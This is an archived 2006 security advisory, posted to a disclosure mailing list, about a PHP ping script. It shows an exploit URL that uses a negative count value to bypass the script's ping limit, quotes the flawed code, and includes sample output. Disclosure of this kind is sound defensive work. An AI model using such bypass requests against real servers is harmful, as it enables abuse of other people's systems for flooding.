Network Security: Detailed info on The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)

Subject:	The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)
Date:	23 Jan 2006 20:54:13 -0000

 [KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)

KAPDA New advisory

Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor: http://www.theworldsend.net/
Risk: Low
Vulnerabilities: Restriction Bypass

Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006

About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple php script for sending pings to remote hosts.
This script has a bad reputation because of a previous remote command execution 
bug.

Vulnerability:
--------------------
Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1

Vuln 2: the scripts only allows you to send 10 or 4 pings

Just look at the count value in the url

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21

Maximum for count is: 10

But because of a signed/unsigned integer overflow (script -> ping) and an extra 
programming error we can bypass that restriction.

Exploit:
--------------------

You can bypass the ping count restriction by just making the count value 
negative.

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
This will bypass the restriction and allows you to send any amount of pings.

Just look at this code snippet from the script

// over count ?
If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR 
NEGATIVE NUMBERS
{
echo 'Maximum for count is: '.$max_count;
echo '<a href="'.$self.'">Back</a>';
}
else
{
// replace bad chars
$host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE 
REMOTE CODE EXECUTION BUG
echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
echo("Ping Output:<br>");
echo '<pre>';

Ping Output:

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:

Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Solution:
--------------------
No patch or fix exits

Original Advisory:
--------------------
http://www.kapda.ir/advisory-231.html

Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir

<Prev in Thread]	Current Thread	[Next in Thread>
The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns), cvh <=

Previous by Date:	[Full-disclosure] Multiple vulnerabilities in CommuniGate Pro Server, Evgeny Legerov
Next by Date:	[Full-disclosure] gnome evolution mail client inline text file DoS issue, Mike Davis
Previous by Thread:	[Full-disclosure] Multiple vulnerabilities in CommuniGate Pro Server, Evgeny Legerov
Next by Thread:	[Full-disclosure] gnome evolution mail client inline text file DoS issue, Mike Davis
Indexes:	[Date] [Thread] [Top] [All Lists]